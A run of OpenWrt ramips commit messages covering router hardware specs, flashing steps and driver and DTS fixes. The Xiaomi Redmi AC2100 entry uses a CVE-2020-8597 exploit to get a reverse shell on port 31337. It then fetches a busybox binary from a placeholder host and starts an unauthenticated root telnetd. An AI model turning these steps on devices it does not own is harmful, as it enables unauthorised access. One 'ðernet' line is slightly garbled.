TP-Link RE220 v2 is a wireless range extender with Ethernet and 2.4G and 5G
WiFi with internal antennas. It's based on MediaTek MT7628AN+MT7610EN.
This port of OpenWRT leverages work done by Andreas Böhler <dev@aboehler.at>
for the TP-Link RE200 v2 as both devices share the same SoC, flash layout
and GPIO pinout.
Specifications
MediaTek MT7628AN (580 Mhz)
64 MB of RAM
8 MB of FLASH
2T2R 2.4 GHz and 1T1R 5 GHz
1x 10/100 Mbps Ethernet
UART header on PCB (57600 8n1)
8x LED (GPIO-controlled), 2x button
There are 2.4G and 5G LEDs in red and green which are controlled separately.
Web Interface Installation
It is possible to upgrade to OpenWrt via the web interface. Simply flash
the -factory.bin from OEM. In contrast to a stock firmware, this will not
overwrite U-Boot.
Signed-off-by: Rowan Border <rowanjborder@gmail.com>
Cudy WR1000 and Wavlink WL-WN577A2 store WAN as well as label MAC address
at the same position in flash.
Suggested-by: Sungbo Eo <mans0n@gorani.run>
Signed-off-by: David Bauer <mail@david-bauer.net>
This package allows to read battery status information and control the
power state of the RAVPower RP-WD009 power management IC.
Signed-off-by: David Bauer <mail@david-bauer.net>
The RAVPower RP-WD009 is a batter-powered pocket sized router with SD
card lot and USB port.
Hardware
--------
CPU: MediaTek MT7628AN
RAM: 64M DDR2
FLASH: 16M GigaDevices SPI-NOR
WLAN: MediaTek MT7628AN 2T2R b/g/n
MediaTek MT7610E 1T1R n/ac
ETH: 1x FastEthernet
SD: SD Card slot
USB: USB 2.0
Custom PMIC on the I2C bus (address 0x0a).
Installation
------------
1. Press and hold down the reset button.
2. Power up the Device. Keep pressing the reset button for 10
more seconds until the Globe LED lights up.
3. Attach your Computer to the Ethernet port. Assign yourself the
address 10.10.10.1/24.
4. Access the recovery page at 10.10.10.128 and upload the OpenWrt
factory image.
5. The flashing will take around 1 minute. The device will reboot
automatically into OpenWrt.
Signed-off-by: David Bauer <mail@david-bauer.net>
This commit adds support for the Wavlink WL-WN577A2 (black case) dual-band
wall-plug wireless router. In Germany this device is sold under the brand
name Maginon WL-755 (white case):
Device specifications:
- CPU: MediaTek MT7628AN (580MHz)
- Flash: 8MB
- RAM: 64MB
- Bootloader: U-Boot
- Ethernet: 2x 10/100 Mbps (Ralink RT3050)
- 2.4 GHz: 802.11b/g/n SoC
- 5 GHz: 802.11a/n/ac MT7610E
- Antennas: internal
- 4 green LEDs: 1 programmable (WPS) + LAN, WAN, POWER
- Buttons: Reset, WPS
- Small sliding power switch
Flashing instructions (U-boot):
- Configure a TFTP server on your PC/Laptop and set its IP
to 192.168.10.100
- Rename the OpenWrt image to firmware.bin and place it in the
root folder of the TFTP server
- Power off (using the small sliding power switch on the left
side) the device and connect an ethernet cable from its LAN
or WAN port to your PC/Laptop
- Press the WPS button (and keep it pressed)
- Power on the device (using the small power switch)
- After a few seconds, when the WAN/LAN LED stops blinking
very fast, release the WPS button
- Flashing OpenWrt takes less than a minute, system will
reboot automatically
- After reboot the WPS LED will indicate the current OpenWrt
running status
Signed-off-by: Lars Wessels <software@bytebox.org>
[removed unused labels - fix whitespace errors - wrap commit message]
Signed-off-by: David Bauer <mail@david-bauer.net>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This adds support for the Netgear R6080, aka Netgear AC1000.
The R6080 has almost the same hardware as the Netgear R6120,
aka Netgear AC1200, but it lacks the USB port, has only 8 MiB flash and
uses a different SERCOMM_HWID.
Specification:
SoC: MediaTek MT7628 (580 MHz)
Flash: 8 MiB
RAM: 64 MiB
Wireless: 2.4Ghz (builtin) and 5Ghz (MT7612E)
LAN speed: 10/100
LAN ports: 4
WAN speed: 10/100
WAN ports: 1
UART (57600 8N1) on PCB
Installation:
Flashing OpenWRT from stock firmware requires nmrpflash. Use an ethernet
cable to connect to LAN port 1 of the R6080, and power the R6080 off.
From the connected workstation, run
`nmrpflash -i eth0 -f openwrt-ramips-mt76x8-netgear_r6080-squashfs-factory.img`,
replacing eth0 with the appropriate interface (can be identified by
running `nmrpflash -L`). Then power on the R6080. After flashing has finished,
power cycle the R6080, and it will boot into OpenWRT. Once OpenWRT has been
installed, subsequent flashes can use the web interface and sysupgrade files.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
[rebase and adjust for 5.4]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This is fixed in 18.06, it appears again in 19.07.
Currently mt7628 sdcard driver do not support polling mode which is for
the device do not have card-detect pin to detect sd card insert. Without
this patch, device will not detect sdcard is inserted. This patch is a
fix of that.
Signed-off-by: Qin Wei <support@vocore.io>
chosen/bootargs are defined to the same value in device DTS files
that is already set in the SoC DTSI. Remove the redundant definitions.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This commit performs minor janitorial work to clean up some code
formatting for the Netgear R6120.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
This moves the trigger for the Netgear R6120's wlan2g_green LED from
base-files/etc/board.d/01_leds to the device-tree file.
This has been applied to R6120 based on findings for the very similar
Netgear R6080.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
[merge case in 01_leds, slightly adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Increase the SPI frequency for ELECOM WRC-1900GST and WRC-2533GST
to 40 MHz by updating the common DTSI file.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
[WRC-1900GST]
Acked-by: NOGUCHI Hiroshi <drvlabo@gmail.com>
[split patch, adjust commit title/message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This drops the shebang from all target files for /lib and
/etc/uci-defaults folders, as these are sourced and the shebang
is useless.
While at it, fix the executable flag on a few of these files.
This does not touch ar71xx, as this target is just used for
backporting now and applying cosmetic changes would just complicate
things.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The uci config section network.globals set up in /bin/config_generate
will only be created if /proc/sys/net/ipv6 exists.
Correspondingly, lacking IPv6 support, the command
uci set network.globals.packet_steering=1
will fail with "uci: Invalid argument" as the network.globals config
has not been set up.
Fix that by adding the setup there as well.
Fixes: dfd62e575c ("ramips: enable packet steering by default on mt7621")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
With the new driver, MAC addresses are not set up in DTS anymore,
and therefore label-mac-device will be useless there.
Setup is done properly in 02_network, so this just removes the
obsolete alias.
Fixes: 5e50515fa6 ("ramips/mt7621: mikrotik: don't use
mtd-mac-address in DTS")
Suggested-by: John Thomson <git@johnthomson.fastmail.com.au>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This updates the display port order for the TEW-810DR to be in line
with the DIR-810L. Both share the same board and pictures on the
vendors' pages indicate the same external numbering scheme as well.
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
[replace commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
The port order displayed in LuCI is currently inverted for this
devices:
LuCI - Device
LAN1 - LAN4
LAN2 - LAN3
LAN3 - LAN2
LAN4 - LAN1
Fix it.
Strangely, the owner of a TRENDnet TEW-810DR reports that the
initial port order is correct, while both devices share the
same board and look similar from the outside. Since I cannot
investigate this without having any of the devices, this does
only touch the DIR-810L for now.
While at it, also merge in the case for zbtlink,zbt-we2026, as
the display port specified for WAN there won't have any effect
anyway.
Reported-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The WAN LED on DIR-810L was actually blinking on LAN1 port
activity. This has already been improved for the TEW-810DR, where
the GPIO has been set up explicitly rather than having it controlled
by the switch.
This patch also applies this setup to the DIR-810L.
In addition, the trigger in 01_leds is set up with
ucidef_set_led_switch for both devices now, so state changes should
be displayed correctly as well.
Reported-by: Roger Pueyo Centelles <roger.pueyo@guifi.net>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Tested-by: Roger Pueyo Centelles <roger.pueyo@guifi.net> [DIR-810L]
Tested-by: J. Scott Heppler <shep971@centurylink.net> [TEW-810DR]
Since 01_enable_packet_steering only touches the network config,
limit the uci commit to this as well.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
According to the manual, the amber power LED is used to indicate boot,
while the green LED is meant to indicate a running system.
While at it, also adjust the DT node names for all LEDs.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MT7620A
* CPU: 580 MHz
* RAM: 64 MB DDR
* Flash: 8MB NOR SPI flash
* WiFi: MT7612E (5GHz) and builtin MT7620A (2.4GHz)
* LAN: 1x100M
The device is identical to the EX6130 except
for the mains socket and the hardware ID.
Installation:
The -factory images can be flashed from the
device's web interface or via nmrpflash.
Notes:
MAC addresses were set up based on the EX6130 setup.
This is based on prior work of Adam Serbinski and Mathias Buchwald.
Tested by Mathias Buchwald.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This partially reverts commit 5acd1ed0be ("ramips: mt7621: fix
Ubiquiti ER-X ports names and MAC addresses"), this change was discussed
in https://github.com/openwrt/openwrt/pull/2901#discussion_r407238452
With commit 5acd1ed0be ("ramips: mt7621: fix Ubiquiti ER-X ports names
and MAC addresses"), all the ports were put into the LAN bridge, with
the argument that the OEM firmware does not have a WAN port enabled. In
the default OEM setup, all of the ports except eth0 are dead and eth0 is
set to a static IP address without providing DHCP services when
connected. It is only after the wizard has been run that eth0 becomes
the WAN port and all the rest of the ports belong to LAN with DHCP
enabled.
Having all of the ports set to the LAN bridge does not mirror the default
OEM setup. To accomplish that, then only eth0 would be in the LAN bridge.
But this is not the expected behaviour of OpenWrt.
Therefore this proposal to set eth0 to WAN and eth1-N to LAN provides
the expected behaviour expected from OpenWrt, maintains the current
documentation as up-to-date, and does not require the user to manually
detach eth0 from the LAN bridge, create the WAN(6) interface(s), and set
eth0 to the WAN(6) interface(s).
Fixes: 5acd1ed0be ("ramips: mt7621: fix Ubiquiti ER-X ports names and MAC addresses")
Signed-off-by: Perry Melange <isprotejesvalkata@gmail.com>
[commit subject and description tweaks]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Previously the dts were using a value determined by empirical testing,
because of a spi driver/clock bug. The bug was fixed quite some time
ago. 33 MHz is the default clock frequency used by RouterBOOT and thus
safe.
Signed-off-by: Tobias Schramm <t.schramm@manjaro.org>
ZyXEL Keenetic has a USB port. Thus, DWC2 USB controller driver should
be in the default image for this device.
Fixes: a7cbf59e0e ("ramips: add new device ZyXEL Keenetic as kn")
Signed-off-by: Alexey Dobrovolsky <dobrovolskiy.alexey@gmail.com>
[fixed whitespace issue]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
In FS#2738 we can see that patch first introduced in
e8ebcff ("ramips: add a explicit reset to dwc2")
breaks USB functionality since 18.06. Thus, this patch should be removed.
Removed:
- 0032-USB-dwc2-add-device_reset.patch
Fixes: FS#2738
Fixes: FS#2964
Signed-off-by: Alexey Dobrovolsky <dobrovolskiy.alexey@gmail.com>
Specifications:
* MediaTek MT7620A (580 Mhz)
* 8 MB of FLASH
* 64 MB of RAM
* 2.4Ghz and 5.0Ghz radios
* 5x 10/100 Mbps Ethernet (1 WAN and 4 LAN)
* UART header on PCB (57600 8n1)
* Green/Orange Power LEDs illuminating a Power-Button Lens
* Green/Orange Internet LEDs GPIO controlled illuminating a Globe/Internet Lens
* 3x button - wps, power and reset
* U-boot bootloader
Installation:
The sysupgrade.bin image is reported to be OEM web flashed with an ncc_att_hwid
appended. ncc_att_hwid is a 32bit binary in the GPL Source download for either
the TEW-810DR or DIR-810L and is located at
source/user/wolf/cameo/ncc/hostTools.
The invocation is: ncc_att_hwid -f tew-810dr-squashfs-factory.bin -a -m "TEW-810DR" -H "1.0R" -r "WW" -c "1.0"
This may need to be altered if your hardware version is "1.1R".
The image can also be directly flashed via serial tftp:
1. Load *.sysupgrade.bin to your tftp server directory and rename for
convenience.
2. Set a static ip 192.168.10.100.
3. NIC cable to a lan port.
4. Serial connection parameters 57600,8N1
5. Power on the TEW-810 and press 4 for a u-boot command line prompt.
6. Verify IP's with U-Boot command "printenv".
7. Adjust tftp settings if needed per the tftp documentation
8. Boot the tftp image to test the build.
9. If the image loads, reset your server ip to 192.168.1.10 and restart network.
10. Log in to Luci, 192.168.1.1, and flash the *sysupgrade.bin image.
Notes:
The only valid MAC address is found in 0x28 of the factory partition.
Other typical offsets/caldata only contain example data: 00:11:22:00:0f:xx
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
[remove "link rx tx" in 01_leds, format and extend commit message,
fix DTS led node names]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
- MT7628NN @ 580 MHz
- 32 MB RAM
- 8 MB Flash
- 5x 10/100 Mbps Ethernet (built-in switch)
- 2.4 GHz WLAN
- 2x external, non-detachable antennas (1x for RT-N10P V3)
Flash instructions:
1. Set PC network interface to 192.168.1.75/24.
2. Connect PC to the router via LAN.
3. Turn router off, press and hold reset button, then turn it on.
4. Keep the button pressed till power led starts to blink.
5. Upload the firmware file via TFTP. (Any filename is accepted.)
6. Wait until the router reboots.
Signed-off-by: Ernst Spielmann <endspiel@disroot.org>
[fix node/property name for state_default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Commit f761f4052c had bogus case syntax, the uci-defaults script threw
errors as a result and exited non-zero, probably didn't do what was
intended, but tried over and over since the non-zero exit prevents the
script from being deleted.
Fixes: f761f4052c ("ramips: mt7621: harmonize naming scheme for Mikrotik")
Signed-off-by: Russell Senior <russell@personaltelco.net>
[extend commit title, add Fixes]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
Olimex RT5350F-OLinuXino devices do not have a default MAC address, and there is
nothing at the 0x4 offset in the factory partition. Using a local address, which
is randomly generated by the kernel, would be a better choice.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
of_get_mac_address can return ERR_PTR since 5.2, so the return pointer should be
checked before used. Otherwise it might cause an oops during boot.
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
This is additional fix of c998ae7f0e.
The sysupgrade image of I-O DATA MT7621 devices manufactured by MSTC
(MitraStar Technology Corp.) faced to the booting issue. This was caused
by imcomplete extraction of large kernel image by U-Boot, and this issue
is occurred in initramfs image after fixing of sysupgrade image.
So, use lzma-loader for initramfs image to fix the issue.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
ramips images now relies on explicit switch setup for proper failsafe
functionality. Remove default cases where it relies on vlan setup in
dts and add switch setup for devices affected.
Signed-off-by: Chuanhong Guo <gch981213@gmail.com>
The location 0x28 in factory partition is the common one used for
ethernet address on this architecture. Despite, it contains the label
MAC address for the devices at hand.
Consequently, this patch moves 0x28 to the ðernet node in DTS files
(setting the WAN MAC address there) and sets up the lan_mac from 0x22
in 02_network. As a benefit, this allows to use label-mac-device in
DTS instead of ucidef_set_label_macaddr.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Like for the RT-AC54U, this uses a DT trigger for WiFi also at the
RT-AC51U. While at it, rename node and label to wifi2g.
Note that the 5g WiFi LED still isn't supported (see PR #3017 for
further details: https://github.com/openwrt/openwrt/pull/3017 )
Tested-by: Davide Fioravanti <pantanastyle@gmail.com>
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The current MAC address assignment for the ASUS RT-AC51U is "wrong",
it actually should be the same as for the RT-AC54U. Fix it.
MAC assignment based on vendor firmware:
2g 0x4 label
5g 0x8004 label +4
lan 0x22 label +4
wan 0x28 label
Thanks to Davide Fioravanti for checking this on his device.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The version inside the compat file determines, if a firmware supports
a specific device. I have not yet fully understood, how this is checked,
but it only seems to indicate which devices are supported by a specific
version of the combined vendor firmware. Devices assume that subsequent
versions, starting with the version that initially added support for a
specific device, are always compatible.
The first compat version that added support for the EP-R6 was '21001:7',
but OpenWrt did use '21001:6' before. This is why the factory image could
not be flashed using the vendor software, but only using TFTP.
The compat version has been bumped by the vendor a few times, but more
devices have been added since (e.g. ER-10X). Because OpenWrt currently
only supports the ER-X, ER-X-SFP and EP-R6, the compat version is
incremented to the version that first supported the EP-R6, which is
'21001:7'.
This allows the factory image to be flashed on EP-R6 without TFTP.
Signed-off-by: Fabian Bläse <fabian@blaese.de>